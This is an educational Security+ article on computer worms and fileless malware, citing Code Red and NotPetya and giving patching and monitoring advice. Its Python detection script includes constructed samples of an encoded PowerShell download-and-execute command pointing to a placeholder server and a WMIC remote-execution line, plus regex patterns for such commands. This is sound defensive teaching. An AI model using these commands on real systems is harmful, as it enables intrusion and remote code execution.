Worms and Fileless Malware: The Sneaky Threats Lurking in Your Network (CompTIA Security+)


A computer worm is self-replicating malware that spreads across a network and infects multiple devices without any user intervention. Unlike a virus, which needs the user to perform some action such as opening or running an infected file, a worm exploits vulnerabilities in network-exposed software and operating systems to reach new hosts on its own, and every host it compromises becomes another scanner looking for the next victim.

Worms can consume network bandwidth and system resources as they replicate and spread throughout a network. They can also perform other malicious actions, such as stealing personal information or launching distributed denial of service (DDoS) attacks, which can render a website or network unavailable by overwhelming it with traffic.

The Devastating Impact of the Code-Red Worm on Microsoft Servers

One example of a worm that caused significant damage is Code Red, which in July 2001 exploited a buffer overflow in the Indexing Service ISAPI extension of Microsoft's Internet Information Services (IIS) web server. Once it gained control of a vulnerable server, Code Red scanned random IP addresses for other IIS servers to infect, defaced pages served by some victims and attempted a denial of service against the White House web site. The original variant never wrote itself to disk: it lived entirely in the memory of the IIS process, which makes it an early precursor of the fileless approach discussed below. Microsoft had published a patch for the flaw about a month before the worm appeared. The worm is estimated to have caused up to $2 billion in damage worldwide.

Another type of malware that has gained prominence in recent years is fileless malware. Rather than dropping a conventional executable on disk, this type of malware runs its payload directly in memory, often injected into a legitimate process, and when it persists at all it does so through registry entries, scheduled tasks or WMI event subscriptions rather than files. Signature-based antivirus that scans files on disk therefore has little to examine, which makes this kind of malware much harder to detect and remove.

Fileless malware can also use "living off the land" techniques to evade detection. These techniques involve using legitimate system tools, such as Windows Management Instrumentation (WMI) or Windows PowerShell, to carry out malicious activities. Because these tools are signed by Microsoft and used daily by administrators, blocking them outright is rarely an option, and traditional antivirus has no malicious file to flag; detection has to focus on how the tools are invoked (which process launched them, what arguments they were given, whether the command line is base64-encoded) rather than on which binary is running.
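As an added illustration (this is not code from the original article), the routine below shows what "detect the invocation, not the binary" looks like in practice. It runs a few behavioural rules over process-creation records: an Office application spawning a script host, PowerShell launched with an encoded command (the base64 is decoded as UTF-16LE so the payload can be inspected), PowerShell arguments typical of download-and-execute cradles, and WMIC being used to start a process, locally or on a remote node. The record format and field names are an assumption modelled on Sysmon Event ID 1 (ParentImage, Image, CommandLine); the sample events, hostnames, paths and addresses are constructed for the example, with the WMIC line imitating the remote-execution pattern the NotPetya section below describes.

```python
import base64
import re
from dataclasses import dataclass


@dataclass
class ProcEvent:
    """A process-creation record. Field names are assumptions modelled on
    Sysmon Event ID 1 (ParentImage, Image, CommandLine)."""
    parent: str
    image: str
    cmdline: str


@dataclass
class Finding:
    rule: str
    detail: str


OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe",
                "cscript.exe", "mshta.exe"}
# Argument patterns common in malicious PowerShell but rare in routine
# administration: in-memory evaluation, download cradles, hidden windows.
SUSPICIOUS_PS = re.compile(
    r"(IEX\b|Invoke-Expression|DownloadString|DownloadFile|FromBase64String"
    r"|-nop\b|-w(?:indowstyle)?\s+hidden)", re.I)
# -EncodedCommand and its abbreviations; the argument is base64 of UTF-16LE text.
ENC_ARG = re.compile(r"(?:^|\s)[-/](?:encodedcommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.I)


def basename(path: str) -> str:
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def decode_encoded_command(cmdline: str):
    """Return the plaintext of a PowerShell -EncodedCommand argument, or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze(ev: ProcEvent) -> list:
    findings = []
    parent, image = basename(ev.parent), basename(ev.image)

    # A document reader launching a script host is how many fileless chains start.
    if parent in OFFICE_PARENTS and image in SCRIPT_HOSTS:
        findings.append(Finding("office_spawns_script_host", f"{parent} -> {image}"))

    if image in ("powershell.exe", "pwsh.exe"):
        decoded = decode_encoded_command(ev.cmdline)
        if decoded is not None:
            findings.append(Finding("powershell_encoded_command", decoded))
        # Inspect the decoded payload as well as the visible command line.
        hit = SUSPICIOUS_PS.search(ev.cmdline + " " + (decoded or ""))
        if hit:
            findings.append(Finding("powershell_download_or_eval", hit.group(1)))

    # WMI used to start a process, especially on a remote node, is a classic
    # living-off-the-land lateral-movement step.
    if image == "wmic.exe" and re.search(r"process\s+call\s+create", ev.cmdline, re.I):
        remote = re.search(r"/node:\S+", ev.cmdline, re.I)
        findings.append(Finding("wmic_process_call_create",
                                "remote " + remote.group(0) if remote else "local"))
    return findings


def scan(events):
    """Run every rule over a batch of events; returns (event index, rule) pairs."""
    return [(i, f.rule) for i, ev in enumerate(events) for f in analyze(ev)]


# --- Constructed sample events (not real logs) -------------------------------
ENC_PAYLOAD = "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/stage.ps1')"
ENC_B64 = base64.b64encode(ENC_PAYLOAD.encode("utf-16le")).decode("ascii")

SAMPLE_EVENTS = [
    ProcEvent(r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              f"powershell.exe -nop -w hidden -enc {ENC_B64}"),
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r"C:\Windows\System32\wbem\WMIC.exe",
              r'wmic /node:"10.0.0.25" /user:"CORP\svc_admin" /password:"x" '
              r'process call create "rundll32.exe C:\Windows\stage.dll,#1"'),
    ProcEvent(r"C:\Windows\explorer.exe",
              r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -File C:\scripts\backup.ps1"),
    ProcEvent(r"C:\Windows\System32\services.exe",
              r"C:\Windows\System32\svchost.exe", "svchost.exe -k netsvcs"),
]

if __name__ == "__main__":
    for idx, rule in scan(SAMPLE_EVENTS):
        print(idx, rule)
```

The first two sample events trigger findings (four in total); the administrator's scheduled backup script and the service host launch do not, which is the point: the same powershell.exe binary is benign or hostile depending on who started it and with what arguments. In a real environment these records come from Sysmon Event ID 1 or from Windows Security event 4688 with command-line auditing enabled, and PowerShell script block logging (Event ID 4104) records the decoded script itself, so the base64 step is only needed when working from process-creation logs alone.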

The NotPetya Attack: Deceptive Delivery and Fileless Spread

NotPetya, which caused significant damage to companies worldwide in June 2017, is the example most often cited for these techniques. Its initial delivery was a software supply-chain compromise rather than an exploit against the application itself: the attackers pushed malicious code through the legitimate update mechanism of M.E.Doc, a tax accounting package widely used in Ukraine, so the first infections looked like a routine vendor update. Once inside a network it spread without any further user action, using the EternalBlue and EternalRomance SMB exploits against unpatched Windows hosts and, on patched ones, credentials harvested from memory combined with legitimate administration tools (PsExec and WMIC) to execute itself on other machines. On each victim it overwrote the Master Boot Record and encrypted the file system's Master File Table, leaving the disk unbootable and the files unreachable. Because the "ransom" process could not actually produce a decryption key, it behaved as a wiper rather than as ransomware.

To protect against worms and fileless malware, the single most effective step is keeping software and operating systems up to date with security patches: Code Red and NotPetya both exploited flaws for which fixes were already available. Strong passwords and multifactor authentication limit the credential reuse that worms like NotPetya depend on for lateral movement. Against fileless malware, signature-based antivirus is not enough; use endpoint protection that watches process behaviour and memory (EDR), enable PowerShell script block logging and process command-line auditing, and restrict or monitor the administrative tools attackers borrow. Finally, users should be cautious about opening attachments or clicking on links in emails or messages from unknown or suspicious sources.

Want to learn more about what it's like to work as an information security analyst? Check out our episode "$90K and Remote? So, What DOES An Information Security Analyst Do?"